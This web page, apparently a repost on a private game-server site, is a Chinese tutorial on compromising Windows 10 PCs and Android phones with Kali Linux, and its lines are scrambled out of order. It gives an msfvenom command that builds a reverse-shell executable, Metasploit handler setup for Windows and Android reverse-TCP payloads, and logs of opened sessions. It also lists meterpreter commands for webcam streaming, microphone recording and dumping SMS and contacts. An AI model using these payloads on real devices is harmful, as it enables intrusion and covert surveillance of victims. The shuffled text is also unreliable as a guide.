轻松游戏!快乐分享!
上一篇:安琦:造娱乐与汽车相结合的视频媒体平台 下一篇:“阿法狗”算什么 一山更比一山高

kali2.0下入侵windows 10和android手机实战

close Closes a channel

webcam_snap Take a snapshot from the specified webcam

Command Description

write Writes data to a channel

use exploit/multi/handler

webcam_list List webcams

load Load one or more meterpreter extensions

set LHOST 192.168.168.111

msf exploit(handler) > exploit

getuid Get the user that the server is running as

exit Terminate the meterpreter session

[*] Device is not rooted

ipconfig Display interfaces

mkdir Make directory

[*] Starting the payload handler…

dir List files (alias for ls)

cat Read the contents of a file to the screen

exploit

=======================

QQ截图20160617104244

(c) 2015 Microsoft Corporation����������Ȩ����

exploit

——- ———–

kali2.0入侵android手机实战

LHOST yes The listen address

route View and modify the routing table

LPORT 4444 yes The listen port

Stdapi: File system Commands

root@kali:~# service postgresql start

use Deprecated alias for ‘load’

===========================

set_timeouts Set the current session timeout values

============================

Core Commands

getwd Print working directory

quit Terminate the meterpreter session

LPORT => 8888

geolocate Get current lat-long using geolocation

Stdapi: System Commands

interval_collect Manage interval collection capabilities

C:\Users\�ѿ�\Desktop\projects>

[*] Sending stage (60790 bytes) to 172.19.0.172

background Backgrounds the current session

cd Change directory

rm Delete the specified file

Command Description

kali-rolling

QQ截图20160617112853

lpwd Print local working directory

^C[-] Exploit failed: Interrupt

[*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2016-06-16 20:59:00 -0400

webcam_stream Play a video stream from the specified webcam

Stdapi: Networking Commands

send_sms Sends SMS from target session

ifconfig Display interfaces

run Executes a meterpreter script or Post module

bgkill Kills a background meterpreter script

Name Current Setting Required Description

dump_calllog Get call log

sleep Force Meterpreter to go quiet, then re-establish session.

channel Displays information or control active channels

Payload options (windows/x64/shell/reverse_tcp):

—- ————— ——– ———–

msf exploit(handler) > set LPORT 8888

Command Description

record_mic Record audio from the default microphone for X seconds

QQ截图20160617112839

meterpreter > help

meterpreter > sessions -I

show options

use exploit/multi/handler

================

Command Description

ps List running processes

Name Current Setting Required Description

get_timeouts Get the current session timeout values

bglist Lists running background scripts

—- ————— ——– ———–

[*] Sending stage (336 bytes) to 192.168.168.109

Module options (exploit/multi/handler):

Android Commands

[*] Preparing player…

QQ截图20160617111554

——- ———–

pwd Print working directory

disable_unicode_encoding Disables encoding of unicode strings

edit Edit a file

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

set payload windows/x64/shell/reverse_tcp

=======================

shell Drop into a system command shell

——- ———–

meterpreter > webcam_stream

Command Description

[*] Started reverse TCP handler on 192.168.168.111:3333

Command Description

? Help menu

set LHOST 172.19.40.110

QQ截图20160617104228

QQ截图20160617104205

help Help menu

[*] Opening player at: kxQmnwHE.html

dump_contacts Get contacts list

[*] Starting…

upload Upload a file or directory

webcam_chat Start a video chat

enable_unicode_encoding Enables encoding of unicode strings

resource Run the commands stored in a file

QQ截图20160617112812

——- ———–

transport Change the current transport mechanism

root@kali:~# msfconsole

[*] Started reverse TCP handler on 172.19.40.110:8888

irb Drop into irb scripting mode

[*] Started reverse TCP handler on 172.19.40.110:4444

QQ截图20160617111438

uuid Get the UUID for the current session

portfwd Forward a local port to a remote service

lcd Change local working directory

machine_id Get the MSF ID of the machine attached to the session

[*] Starting the payload handler…

[*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2016-06-16 23:11:36 -0400

QQ截图20160617111539

Stdapi: Webcam Commands

Microsoft Windows [�汾 10.0.10586]

search Search for files

sysinfo Gets information about the remote system, such as OS

[*] Exploit completed, but no session was created.

getlwd Print local working directory

info Displays information about a Post module

execute Execute a command

[*] Starting the payload handler…

rmdir Remove directory

=============

——- ———–

show options

download Download a file or directory

wlan_geolocate Get current lat-long using WLAN information

dump_sms Get sms messages

set PAYLOAD android/meterpreter/reverse_tcp

meterpreter > check_root

[*] Streaming…

ls List files

set LPORT 3333

check_root Check if device is rooted

bgrun Executes a meterpreter script as a background thread

read Reads data from a channel

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

——- ———–


除非注明,迷失传奇私服文章均为原创,转载请以链接形式标明本文地址

本文地址:http://rrc.org.cn/btb/4696.html
Copyright © 2018-2019 迷失传奇私服 版权所有